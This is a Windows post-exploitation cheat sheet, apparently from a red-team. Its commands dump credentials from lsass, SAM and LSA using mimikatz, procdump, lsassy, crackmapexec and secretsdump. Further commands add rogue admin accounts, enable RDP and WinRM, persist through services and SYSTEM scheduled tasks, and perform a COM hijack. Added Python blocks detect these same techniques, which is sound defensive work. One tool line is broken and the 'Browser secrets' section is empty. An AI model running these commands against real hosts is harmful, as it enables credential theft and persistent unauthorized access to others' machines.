Post-Ex Windows

Dump secrets


crackmapexec smb perim_up.txt -u '<user>' -d '<domain>' -p '<pass>' --lsa


crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> --sam

reg save hklm\sam .\sam
reg save hklm\system .\system
reg save hklm\security .\security
impacket-secretsdump -sam sam -security security -system system LOCAL


crackmapexec smb <host_file> -u <user> -d <domain> -H <hash> -M lsassy

lsassy -d '.' -u 'Administrateur' -H '<hash>' <ip>
lsassy -d <domain> -u <user> -p <pass> <ip>

./ -u <user> -p <password> -t <ip>

pypykatz lsa minidump lsass.dmp

procdump.exe -accepteula -ma lsass c:\WINDOWS\Temp\lsass.txt

.\mimikatz.exe "log" "privilege::debug" "sekurlsa::logonpasswords" exit


.\mimikatz.exe "log" "privilege::debug" "kerberos::list /export" exit
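
Every technique in this section leaves one of two traces on the endpoint: a characteristic command line (reg save of the SAM/SYSTEM/SECURITY hives, procdump -ma against lsass, mimikatz module names) or a handle to lsass.exe opened with PROCESS_VM_READ. The Python below is an added example, not part of these notes, that applies both checks to constructed Sysmon-style Event ID 1 (process create) and Event ID 10 (process access) records. The field names follow Sysmon; the sample events and the MsMpEng allow-list entry are assumptions to replace with your own baseline.

```python
"""Detection logic for the credential-dumping commands above, run over
constructed Windows telemetry. Added example, not part of the original notes."""
import re
from dataclasses import dataclass

# Access-mask bit from Sysmon Event ID 10 (ProcessAccess) that a tool needs
# in order to read another process's memory.
PROCESS_VM_READ = 0x0010

# Processes that legitimately open lsass with read access on many hosts.
# Example allow-list (assumption); tune it from your own baseline.
ALLOWED_LSASS_READERS = {
    r"c:\program files\windows defender\msmpeng.exe",
}

# Command-line signatures for the techniques listed on this page.
COMMAND_LINE_RULES = [
    ("sam_hive_export",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("lsass_minidump",
     re.compile(r"\bprocdump(?:64)?(?:\.exe)?\b.*\s-ma\s+lsass\b", re.I)),
    ("mimikatz_module",
     re.compile(r"sekurlsa::|privilege::debug|kerberos::list", re.I)),
]


@dataclass
class Finding:
    rule: str
    event_id: int
    image: str
    detail: str


def check_process_create(ev):
    """Match a process-creation event (Sysmon ID 1 / Security 4688) against
    the command-line rules. Returns a list of Findings (possibly empty)."""
    cmd = ev.get("CommandLine", "")
    return [Finding(rule, 1, ev.get("Image", ""), cmd)
            for rule, pattern in COMMAND_LINE_RULES if pattern.search(cmd)]


def check_process_access(ev):
    """Flag a Sysmon ID 10 event in which a non-allow-listed process opened
    lsass.exe with PROCESS_VM_READ, the right minidump tools and in-memory
    credential extractors require."""
    target = ev.get("TargetImage", "").lower()
    source = ev.get("SourceImage", "").lower()
    if not target.endswith(r"\lsass.exe") or source in ALLOWED_LSASS_READERS:
        return []
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    if granted & PROCESS_VM_READ:
        return [Finding("lsass_memory_read", 10, ev.get("SourceImage", ""),
                        f"GrantedAccess={granted:#x}")]
    return []


def scan(events):
    """Route each event to the matching check and collect all findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            findings.extend(check_process_create(ev))
        elif ev.get("EventID") == 10:
            findings.extend(check_process_access(ev))
    return findings


# Constructed sample events in Sysmon field naming; not real captures.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam .\sam"},
    {"EventID": 1, "Image": r"C:\Tools\procdump.exe",
     "CommandLine": r"procdump.exe -accepteula -ma lsass C:\Windows\Temp\lsass.txt"},
    {"EventID": 1, "Image": r"C:\Users\Public\m.exe",
     "CommandLine": r'm.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_id} {f.image}: {f.detail}")
```

The 0x1000 access (PROCESS_QUERY_LIMITED_INFORMATION) from svchost is ignored on purpose: many system components query lsass without reading its memory, and alerting on every handle produces noise that hides the 0x1010 open from an unknown binary.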

Browser secrets


Create/add new local admin account

net user <user> <pass> /add
net localgroup "Administrators" <user> /add

Enable WinRM

Enable-PSRemoting -SkipNetworkProfileCheck -Force

Enable RDP

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

Add user to the RDP group

net localgroup "Remote Desktop Users" <user> /add

Create service

New-Service -BinaryPathName C:\Users\sqlServer\Documents\system2.exe -Name syshell -DisplayName syshell -StartupType Automatic 
Start-Service syshell

sc \\<host> create ServiceName binpath= "C:\windows\system32\calc.exe"

\\<host> is optional; omit it to create the service on the local machine. The space after binpath= is required by sc.

To check that the service comes up correctly, you can reboot the host. First get the build number:

wmic /node:<host> os get buildnumber

then reboot:

wmic /node:<host> os where buildnumber="<Number>" call reboot

Execute binary using WMIC

wmic /node:<host> process call create "C:\windows\system32\calc.exe"

/node:<host> is optional; omit it to run on the local machine.

Stop process

Get the PID of the service process (sc query does not show it; queryex does): sc \\<host> queryex ServiceName

then: wmic /node:<host> process where processid=<PID> call terminate

/node:<host> is optional

or alternatively: taskkill /S <host> /PID <PID> /F

/S <host> is optional

Create Scheduled tasks

schtasks /create /S <host> /tn <name> /sc once /sd 01/01/1910 /ru system /tr "C:\windows\system32\calc.exe"

schtasks /create /S <host> /tn OBLIGE /tr "C:\windows\system32\calc.exe" /sc once /ST 18:30

/ru and /S <host> are optional. To check that the task has been created, run: schtasks /query /S <host> /tn <name>
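
The account, RDP, WinRM, service and scheduled-task changes in the sections above all persist in host state, so a defender can catch them by comparing a fresh snapshot against a known-good baseline rather than relying on command-line logging alone. This Python is an added example, not part of these notes: the two snapshot dicts are constructed stand-ins for the parsed output of net localgroup, the fDenyTSConnections value, Get-Service and schtasks /query, and the trusted-directory list is an assumption to tune per environment. The names from the commands above (syshell, system2.exe, OBLIGE) appear only as sample data.

```python
"""Baseline diff for the persistence changes above. Added example, not part of
the original notes; both snapshots are constructed sample data."""

# Roots under which an auto-start service binary is normally expected
# (example list, an assumption; extend it for your own environment).
TRUSTED_BINARY_ROOTS = (
    "c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\",
    "%windir%", "%systemroot%", "%programfiles%",
)


def binary_is_trusted(path):
    """True if a service binary path (possibly quoted) sits under a trusted root."""
    p = path.strip().strip('"').lower()
    return p.startswith(TRUSTED_BINARY_ROOTS)


def audit(baseline, now):
    """Compare two host snapshots; return (category, detail) findings in the
    order of the sections above."""
    findings = []

    # Create/add new local admin account, add user to the RDP group
    for user in sorted(now["local_admins"] - baseline["local_admins"]):
        findings.append(("new_local_admin", user))
    for user in sorted(now["rdp_users"] - baseline["rdp_users"]):
        findings.append(("new_rdp_user", user))

    # Enable RDP / Enable WinRM
    if baseline["fDenyTSConnections"] == 1 and now["fDenyTSConnections"] == 0:
        findings.append(("rdp_enabled", "fDenyTSConnections changed 1 -> 0"))
    if now["winrm_enabled"] and not baseline["winrm_enabled"]:
        findings.append(("winrm_enabled", "PS remoting listener became active"))

    # Create service: new services, and existing services whose binary moved
    for name, svc in now["services"].items():
        old = baseline["services"].get(name)
        if old is None:
            if svc["start"] == "auto" and not binary_is_trusted(svc["path"]):
                findings.append(("untrusted_autostart_service", f"{name}: {svc['path']}"))
            else:
                findings.append(("new_service", f"{name}: {svc['path']}"))
        elif old["path"].lower() != svc["path"].lower():
            findings.append(("service_path_changed",
                             f"{name}: {old['path']} -> {svc['path']}"))

    # Create scheduled tasks: new tasks, with SYSTEM-level ones called out
    for name, task in now["scheduled_tasks"].items():
        if name in baseline["scheduled_tasks"]:
            continue
        if task["run_as"].upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
            findings.append(("new_system_task", f"{name}: {task['action']}"))
        else:
            findings.append(("new_task", f"{name} as {task['run_as']}: {task['action']}"))
    return findings


# Constructed snapshots standing in for parsed output of net localgroup,
# the fDenyTSConnections registry value, Get-Service and schtasks /query.
SNAPSHOT_BASELINE = {
    "local_admins": {"Administrator", "CORP\\Domain Admins"},
    "rdp_users": set(),
    "fDenyTSConnections": 1,
    "winrm_enabled": False,
    "services": {
        "Spooler": {"path": "C:\\Windows\\System32\\spoolsv.exe", "start": "auto"},
    },
    "scheduled_tasks": {
        "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": {
            "run_as": "SYSTEM", "action": "%windir%\\system32\\defrag.exe -c"},
    },
}
SNAPSHOT_NOW = {
    "local_admins": {"Administrator", "CORP\\Domain Admins", "backup_svc"},
    "rdp_users": {"backup_svc"},
    "fDenyTSConnections": 0,
    "winrm_enabled": True,
    "services": {
        "Spooler": {"path": "C:\\Windows\\System32\\spoolsv.exe", "start": "auto"},
        "syshell": {"path": "C:\\Users\\sqlServer\\Documents\\system2.exe", "start": "auto"},
    },
    "scheduled_tasks": {
        "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag": {
            "run_as": "SYSTEM", "action": "%windir%\\system32\\defrag.exe -c"},
        "\\OBLIGE": {"run_as": "SYSTEM", "action": "C:\\windows\\system32\\calc.exe"},
    },
}

if __name__ == "__main__":
    for category, detail in audit(SNAPSHOT_BASELINE, SNAPSHOT_NOW):
        print(f"{category:30s} {detail}")
```

Comparing state rather than command lines also catches the same changes made through other tools (PowerShell cmdlets, GUI, WMI), which the regex approach for a single section would miss.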

COM hijack

schtasks /query /xml > tasks.xml
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
reg export "HKLM\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32" export.reg

# In export.reg, change the hive to HKCU and change the DLL path, then import it
reg import export.reg /reg:64
reg query "HKCR\CLSID\{<COM_CLSID>}\Inprocserver32"
reg query "HKCU\software\classes\CLSID\{<COM_CLSID>}\Inprocserver32"
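
The export/import step above works because COM activation consults HKCU\Software\Classes\CLSID before HKLM\Software\Classes\CLSID, so a per-user InprocServer32 entry silently replaces the machine-wide DLL for every non-elevated process that loads that CLSID. A defender can audit for this by exporting both hives and diffing them per CLSID. The Python below is an added example, not part of these notes: a small parser for the .reg format that reg export produces, followed by a check for HKCU InprocServer32 entries that shadow an HKLM entry with a different DLL. The CLSIDs and paths in SAMPLE_REG are constructed. Real exports are UTF-16 with a BOM, so read them with open(path, encoding="utf-16") before passing the text in.

```python
"""Parse a .reg export and flag per-user InprocServer32 entries that shadow a
machine-wide COM registration. Added example, not part of the original notes."""
import re

HIVE_ALIASES = {
    "hkey_local_machine": "hklm",
    "hkey_current_user": "hkcu",
    "hkey_classes_root": "hkcr",
    "hkey_users": "hku",
}
# A value line is either @=... (default value) or "name"=... with .reg escaping.
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')
INPROC_KEY = re.compile(
    r'^(hklm|hkcu)\\software\\classes\\clsid\\(\{[0-9a-f-]{36}\})\\inprocserver32$')


def _unescape(s):
    # Undo .reg string escaping: a doubled backslash becomes one, \" becomes "
    return re.sub(r'\\(["\\])', r'\1', s)


def _normalize_key(key):
    # Lower-case the path and shorten the hive name so HKLM/HKCU compare cleanly.
    hive, _, rest = key.partition("\\")
    return HIVE_ALIASES.get(hive.lower(), hive.lower()) + "\\" + rest.lower()


def parse_reg(text):
    """Return {normalized_key: {value_name: value}} for a .reg file body.
    The default value is stored under the name ''. Only quoted (REG_SZ)
    values are unescaped; dword:/hex: values are kept as raw text."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = _normalize_key(line[1:-1])
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            name = "" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            value = m.group(2)
            if value.startswith('"') and value.endswith('"'):
                value = _unescape(value[1:-1])
            keys[current][name] = value
    return keys


def find_com_hijacks(keys):
    r"""COM activation reads HKCU\Software\Classes before HKLM\Software\Classes,
    so an HKCU InprocServer32 whose default value differs from the HKLM one
    redirects every non-elevated load of that CLSID. Return such pairs."""
    per_hive = {"hklm": {}, "hkcu": {}}
    for key, values in keys.items():
        m = INPROC_KEY.match(key)
        if m and "" in values:
            per_hive[m.group(1)][m.group(2)] = values[""]
    hits = []
    for clsid, user_dll in per_hive["hkcu"].items():
        machine_dll = per_hive["hklm"].get(clsid)
        if machine_dll is not None and machine_dll.lower() != user_dll.lower():
            hits.append({"clsid": clsid, "hklm_dll": machine_dll, "hkcu_dll": user_dll})
    return hits


# Constructed export text (CLSIDs and paths are made up for the example).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-000000000001}\InprocServer32]
@="C:\\Windows\\System32\\shell32.dll"
"ThreadingModel"="Apartment"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-000000000001}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\Temp\\payload.dll"
"ThreadingModel"="Apartment"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-000000000002}\InprocServer32]
@="C:\\Windows\\System32\\oleaut32.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-000000000002}\InprocServer32]
@="C:\\Windows\\System32\\oleaut32.dll"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{11111111-2222-3333-4444-000000000003}\InprocServer32]
@="C:\\Users\\alice\\AppData\\Local\\Programs\\PerUserApp\\peruser.dll"
'''

if __name__ == "__main__":
    for hit in find_com_hijacks(parse_reg(SAMPLE_REG)):
        print(f"{hit['clsid']}: HKLM {hit['hklm_dll']} shadowed by HKCU {hit['hkcu_dll']}")
```

Only the first CLSID is reported. The second has identical HKLM and HKCU values, and the third exists only in HKCU, which is how legitimately user-installed software registers its COM servers; if you want to rank those too, sort them by whether the DLL sits in a temp or profile directory.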

Disconnect user

rwinsta <sessionId> /server:<host>

To get the session ID, run qwinsta (also with /server:<host> for a remote machine).